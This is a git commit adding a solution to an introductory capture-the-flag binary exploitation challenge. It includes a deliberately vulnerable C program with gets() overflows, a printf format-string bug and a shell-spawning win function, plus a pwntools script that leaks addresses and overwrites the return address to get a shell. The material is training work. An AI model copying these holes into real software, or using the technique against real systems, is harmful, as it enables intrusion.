commit 88f4ea4c85a4224515ba1146b8058bce9e2a1994
Author: Louis Burda <quent.burda@gmail.com>
Date: Sat, 30 Mar 2024 15:50:18 +0100
Add solution
Diffstat:
7 files changed, 119 insertions(+), 0 deletions(-)
diff --git a/chall/intro-pwn-1.zip b/chall/intro-pwn-1.zip
Binary files differ.
diff --git a/solve/Dockerfile b/solve/Dockerfile
@@ -0,0 +1,7 @@
+# docker build -t pwn1 . && docker run -p 1024:1024 --rm -it pwn1
+
+FROM ubuntu:22.04
+COPY pwn1 flag ynetd .
+
+EXPOSE 1024
+CMD ./ynetd ./pwn1
diff --git a/solve/flag b/solve/flag
@@ -0,0 +1 @@
+CSCG{NOW_PRACTICE_EVEN_MORE}
diff --git a/solve/pwn1 b/solve/pwn1
Binary files differ.
diff --git a/solve/pwn1.c b/solve/pwn1.c
@@ -0,0 +1,70 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <string.h>
+
+// pwn1: gcc pwn1.c -o pwn1
+
+// --------------------------------------------------- SETUP
+
+void ignore_me_init_buffering() {
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void kill_on_timeout(int sig) {
+ if (sig == SIGALRM) {
+ printf("[!] Anti DoS Signal. Patch me out for testing.");
+ _exit(0);
+ }
+}
+
+void ignore_me_init_signal() {
+ signal(SIGALRM, kill_on_timeout);
+ alarm(60);
+}
+
+// --------------------------------------------------- MENU
+
+void WINgardium_leviosa() {
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Slytherin.. │\n");
+ printf("└───────────────────────┘\n");
+ system("/bin/sh");
+}
+
+void welcome() {
+ char read_buf[0xff];
+ printf("Enter your witch name:\n");
+ gets(read_buf);
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Hufflepuff! │\n");
+ printf("└───────────────────────┘\n");
+ printf(read_buf);
+}
+
+void AAAAAAAA() {
+ char read_buf[0xff];
+
+ printf(" enter your magic spell:\n");
+ gets(read_buf);
+ if(strcmp(read_buf, "Expelliarmus") == 0) {
+ printf("~ Protego!\n");
+ } else {
+ printf("-10 Points for Hufflepuff!\n");
+ _exit(0);
+ }
+}
+// --------------------------------------------------- MAIN
+
+void main(int argc, char* argv[]) {
+ ignore_me_init_buffering();
+ ignore_me_init_signal();
+
+ welcome();
+ AAAAAAAA();
+}
+
+
diff --git a/solve/solve.py b/solve/solve.py
@@ -0,0 +1,41 @@
+from pwn import *
+import os
+
+if args.debug:
+ p = process("ncat localhost 1024".split())
+else:
+ if len(sys.argv) < 2:
+ print("USAGE: exploit.py <ID>")
+ sys.exit(1)
+ p = process("ncat --ssl {}-1024-intro-pwn-1.challenge.cscg.live 1337"
+ .format(sys.argv[1]).split())
+
+p.recvuntil(b"Enter your witch name:")
+
+p.sendline(b"%p " * 50)
+
+leaked = p.recvuntil(b"enter your magic spell:")
+leak_vals = leaked.decode().split(" ")
+
+for i,v in enumerate(leak_vals):
+ print(i, "->", v)
+
+base = int(leak_vals[41], 16) - 2537
+win = base + 0x9ec
+extra_ret = base + 0x0b2d
+
+print("RERET:", hex(extra_ret))
+print("WIN:", hex(win))
+
+# Why do we need to realign the stack with another return?
+
+# The `movaps xmmword ptr` instruction requires the stack pointer to be
+# 16 byte aligned. Because of this we need to return twice, such that
+# the stack pointer moves down another 8 bytes.
+
+p.send("Expelliarmus\x00" + "A" * 251)
+p.send(p64(extra_ret))
+p.send(p64(win))
+p.send("\n")
+
+p.interactive()
diff --git a/solve/ynetd b/solve/ynetd
Binary files differ.
